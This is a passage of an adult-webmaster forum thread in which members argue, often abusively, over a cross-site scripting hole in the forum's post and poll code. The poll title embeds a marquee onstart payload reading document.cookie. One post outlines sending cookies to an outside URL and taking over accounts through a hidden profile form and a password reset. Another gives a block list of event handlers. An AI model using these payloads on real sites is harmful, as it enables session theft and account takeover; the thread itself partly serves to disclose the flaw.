![]() |
![]() |
![]() |
||||
Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums. You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today! If you have any problems with the registration process or your account login, please contact us. |
View Poll Results: Bad Code. | |||
Ouch ?<marquee width=1 height=1 loop=1 onstart="fudge.value='This is your GFY cookie '+document . cookie"></marquee> |
![]() ![]() ![]() ![]() |
9 | 50.00% |
Huh ? |
![]() ![]() ![]() ![]() |
11 | 61.11% |
Multiple Choice Poll. Voters: 18. You may not vote on this poll |
![]() ![]() |
|
Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed. |
|
Thread Tools
![]() |
![]() |
#51 |
:glugglug
Join Date: Mar 2003
Location: Where the Wild Things Are
Posts: 26,118
|
50 GFY codes Exploitable
![]() |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#52 |
Confirmed User
Join Date: Feb 2003
Location: Portland
Posts: 826
|
Hehe nice job Road Rash do you have ICQ!
__________________
harbinc at gmail dot com |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#53 |
Confirmed User
Join Date: Jun 2002
Location: God's Country (Georgia)
Posts: 3,706
|
If you weren't such a pompus ass and obvious attention whore people might think you were actually trying to help.
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#54 | |
So Fucking Banned
Join Date: Mar 2004
Location: Not Far Enough !!
Posts: 340
|
Quote:
![]() |
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#55 |
Confirmed User
Join Date: Feb 2003
Location: Portland
Posts: 826
|
Road Rash I would also like to see how this code works and how it can be fixed if you can email me the code to harbinc at cox.net
__________________
harbinc at gmail dot com |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#56 | ||
Confirmed User
Industry Role:
Join Date: May 2001
Location: Australia
Posts: 934
|
Quote:
what it actually is. It makes you look like you don't understand the code your posting when you call it HTML and say it can do anything on any server. What you are talking about is a very particular combination of techniques. Once you know the combination it does indeed appear easy and many of us have seen these techniques used before in different situations. However without investigation of the steps needed someone can't just spend 10 seconds looking at the code to figure out exact what the fuck it is you are talking about. I'm guessing english isn't your first language.... no offence but when you use all the wrong words and describe things totally backwards it does kinda make it hard for anyone to agree with you. Quote:
rather than talking all this crap about server hacking and sending emails. Lens.... He is right... It is exploitable. You need to block a few event handlers such as onstart, onclick, etc. -Ben
__________________
Cyberwurx Hosting After trying 5 different hosts, I found the best. Since 1997 I've had 2 hours of downtime. Fast support, great techs, no hype, no gimmicks. <- I in no way endorse whatever just got stuck on the left of my post. |
||
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#57 |
Confirmed User
Industry Role:
Join Date: Mar 2003
Location: ::::::::::::: :::::::::::||::::::::::: :::::::::::||::::::::::: :::::::::::||::::::::::: :::::::::::||::::::::::: :::::::::::||::::::::::: ::::::||||||||||||:::::: :::::::::::||::::::::::: :::::::::::||::::::::::: ::::::::::::::::::::::::
Posts: 7,197
|
You know no one gives a shit when....
Road Rash 23 mryellow 7 icedemon 4 You have three times as many posts as the second person in the thread (who successfully tore you down, might I add) No I will not grab a brain and no I'm not your son. http://www.polarhome.com/~plasticlsd/4smokey.MP3 nobody
__________________
Amen |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#58 |
So Fucking Banned
Join Date: Mar 2004
Location: Not Far Enough !!
Posts: 340
|
jc so far everyone who doubted me has admitted after thinking about it for 2 seconds they were wrong .. Go back to bed jc.
![]() |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#59 |
Confirmed User
Industry Role:
Join Date: May 2001
Location: Australia
Posts: 934
|
It's just the guy mixes in so much bullshit with his facts that it
makes him appear like he has no idea what he's talking about. Nice camouflage job... However I think I'd rather appear smart then dumb. Did it take you 2 seconds to come up with? Stop trying to make ppl feel bad for not understanding your backwards and simply wrong comments. -Ben
__________________
Cyberwurx Hosting After trying 5 different hosts, I found the best. Since 1997 I've had 2 hours of downtime. Fast support, great techs, no hype, no gimmicks. <- I in no way endorse whatever just got stuck on the left of my post. |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#60 |
Confirmed User
Industry Role:
Join Date: Mar 2003
Location: ::::::::::::: :::::::::::||::::::::::: :::::::::::||::::::::::: :::::::::::||::::::::::: :::::::::::||::::::::::: :::::::::::||::::::::::: ::::::||||||||||||:::::: :::::::::::||::::::::::: :::::::::::||::::::::::: ::::::::::::::::::::::::
Posts: 7,197
|
Go back to the secureity forum.... where peopel give a fuck.
Your nothing but an exploit baby. Produce one piece of usefull software you have written. FEEL THE NOBODIES, WANNA BE SOMBODIES..... <img src="http://www.gofuckyourself.com/images/smilies/1orglaugh.gif" width=360 height=360>
__________________
Amen |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#61 |
So Fucking Banned
Join Date: Mar 2004
Location: Not Far Enough !!
Posts: 340
|
mryellowsnow.
as i explained if i gave exact details on it it would also explain to every little punk with a copy and paste how to do it , so thats why i was vague.. sorry if you couldnt figure that out.. |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#62 |
Confirmed User
Join Date: Jun 2003
Location: Lutz, FL
Posts: 1,022
|
I can see how what you mentioned can be used to make popups and other stuff in j a v a s c r i p t that could cause trouble on GFY. What you found is a good find. But you really made it more than it really is. It can't do most of the stuff you mentioned.
Being able to change the password by having the cookie sent to you cannot be done. At least without asking the client permission before it is actually sent. It could be done with old browsers (I'm talking about the really old ones on Win 95 machines). But most newer browsers won't let emails be sent via j a v a s c r i p twithout permission from the client first. Sending out emails via j a v a s c r i p tused to be a big problem in the early days. That's how emails were harvested. That has since been fixed for some years now.
__________________
Clips4Sale.com |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#63 |
Confirmed User
Industry Role:
Join Date: May 2001
Location: Australia
Posts: 934
|
See the problem?
People still think you're talking about hacking servers or sending emails from client machines. It's not the fact that you hid the method.... I do think that was quite good of you..... It's that you were talking about totally different things which were quite simply wrong. You can not for example do anything to any server with the method you're using. You really can't blame someone for thinking you're barking up the wrong tree when you say that jav-as-cript can do anything you want to the server. Hide the actual code sure..... but why make yourself look stupid by saying things that are so wrong. Lens it does need fixing..... He may look stupid but he has found an exploit that someone will probably soon use and could upset some ppl. -Ben
__________________
Cyberwurx Hosting After trying 5 different hosts, I found the best. Since 1997 I've had 2 hours of downtime. Fast support, great techs, no hype, no gimmicks. <- I in no way endorse whatever just got stuck on the left of my post. |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#64 |
So Fucking Banned
Join Date: Mar 2004
Location: Not Far Enough !!
Posts: 340
|
You dont need to use email just add the cookie to a string and pop it in a window example, yoururl.com/logged.cgi?+document . cookie
to change passwrod just make a hidden form with a replica of the profile form ( but with your own info ) now the email is whatever you changed it to , now just reset the password and have it sent to the new email , shebang. |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#65 |
ICQ: 178725656
Join Date: Nov 2002
Location: Sunny San Diego
Posts: 12,366
|
For somebody that is so good at 'hacking' you sure do suck at reading and understanding the sig rules.
![]()
__________________
![]() |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#66 |
So Fucking Banned
Join Date: Mar 2004
Location: Not Far Enough !!
Posts: 340
|
duocash is a top banner sponsor moron
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#67 |
Confirmed User
Industry Role:
Join Date: May 2001
Location: Australia
Posts: 934
|
Without actual testing I'm still not sure you'd fit in everything you
want to do into the character limit. However yes it is a worry. -Ben
__________________
Cyberwurx Hosting After trying 5 different hosts, I found the best. Since 1997 I've had 2 hours of downtime. Fast support, great techs, no hype, no gimmicks. <- I in no way endorse whatever just got stuck on the left of my post. |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#68 | |
ICQ: 178725656
Join Date: Nov 2002
Location: Sunny San Diego
Posts: 12,366
|
Quote:
2. Signature rules. Maximum 120x60 button and no more than 3 text lines of default size and color. New as of 1/1/2003: if your sig is for a GFY top banner sponsor, you may use a 468x60 instead of a 120x60. Yes there is a reason this is so big. Also putting your text in a cell and making it look like a button is against the rules. Let me repeat... A 120 x 60 button and no more that 3 lines of DEFAULT SIZE AND COLOR text. First, your sig banner is 645 x 120 -- that is ABOVE THE ALLOWED 468x60 for top banner sponsor. Second, your text is NOT the default size OR color. So eat a dick buttmunch --- go google for more GFY hacks ![]()
__________________
![]() |
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#69 |
So Fucking Banned
Join Date: Mar 2004
Location: Not Far Enough !!
Posts: 340
|
like i said i have already tested it , it fits under the character limit just fine besides you can hide an unlimited amount of characters in a hahahahahahahahahaha ;) with a document write ....
To the moron complaining about my sig.. my sig fits gfy see the top 10 posters on this board... my sig is the same. quit crying because you cant say anything usefull |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#70 | |
ICQ: 178725656
Join Date: Nov 2002
Location: Sunny San Diego
Posts: 12,366
|
Quote:
"Mommy, mommy - the other kids are doing it, so that means its ok right mommy?" ![]() ![]() ![]() like I said, you sure do have a hard time reading and understanding the sig rules.
__________________
![]() |
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#71 |
So Fucking Banned
Join Date: Mar 2004
Location: Not Far Enough !!
Posts: 340
|
I dont bend over , you do.. big difference.
Why would i use an undersized sig when the mods allow people to use oversized sigs if they are using a top sponsor. Maybe if you sent one of the mods and angry email about it or cried to them via icq they might change all the sigs just for you.. Whoops i must have been dreaming there for a second ![]() |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#72 |
Confirmed User
Industry Role:
Join Date: May 2001
Location: Australia
Posts: 934
|
ext jv.... yeah got ya.
-Ben
__________________
Cyberwurx Hosting After trying 5 different hosts, I found the best. Since 1997 I've had 2 hours of downtime. Fast support, great techs, no hype, no gimmicks. <- I in no way endorse whatever just got stuck on the left of my post. |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#73 |
So Fucking Banned
Join Date: Mar 2004
Location: Not Far Enough !!
Posts: 340
|
Something close to this..
<img src="http://216.130.172.224/haha1.jpg"> <img src="http://216.130.172.224/haha2.jpg"> <img src="http://216.130.172.224/haha3.jpg"> |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#74 |
Confirmed User
Industry Role:
Join Date: May 2001
Location: Australia
Posts: 934
|
No no.... much more dangerious.
You could run any new IE, ActiveX, Java, or Flash exploit on a great deal of GFY members before the admins saw it. This combined with other exploits or some yet to be discovered could allow an attacker to gain complete control of your home system via your browser. -Ben
__________________
Cyberwurx Hosting After trying 5 different hosts, I found the best. Since 1997 I've had 2 hours of downtime. Fast support, great techs, no hype, no gimmicks. <- I in no way endorse whatever just got stuck on the left of my post. |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#75 | |
ICQ: 178725656
Join Date: Nov 2002
Location: Sunny San Diego
Posts: 12,366
|
Quote:
__________________
![]() |
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#76 |
Confirmed User
Industry Role:
Join Date: May 2001
Location: Australia
Posts: 934
|
GFY needs to block the following words:
onload onunload onchange onsubmit onreset onselect onblur onfocus onkeydown onkeypress onkeyup onclick ondblclick hahahahahahahadown hahahahahahahamove hahahahahahahaout hahahahahahahaover hahahahahahahaup -Ben
__________________
Cyberwurx Hosting After trying 5 different hosts, I found the best. Since 1997 I've had 2 hours of downtime. Fast support, great techs, no hype, no gimmicks. <- I in no way endorse whatever just got stuck on the left of my post. |
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#77 | |
ICQ: 178725656
Join Date: Nov 2002
Location: Sunny San Diego
Posts: 12,366
|
Quote:
yes, those hahaha's will fuck you up everytime sorry, it was funny...
__________________
![]() |
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#78 | |
So Fucking Banned
Join Date: Mar 2004
Location: Not Far Enough !!
Posts: 340
|
Quote:
BTW you missed a few event handlers ;) and several other things.. |
|
![]() |
![]() ![]() ![]() ![]() ![]() |
![]() |
#79 |
Confirmed User
Industry Role:
Join Date: May 2001
Location: Australia
Posts: 934
|
Yeah can't be bothered hunting everything, leave that to GFY.
Just posting again to see if they are blocked...... Lens.... It's actually quite serious. onload onunload onchange onsubmit onreset onselect onblur onfocus onkeydown onkeypress onkeyup onclick ondblclick -Ben
__________________
Cyberwurx Hosting After trying 5 different hosts, I found the best. Since 1997 I've had 2 hours of downtime. Fast support, great techs, no hype, no gimmicks. <- I in no way endorse whatever just got stuck on the left of my post. |
![]() |
![]() ![]() ![]() ![]() ![]() |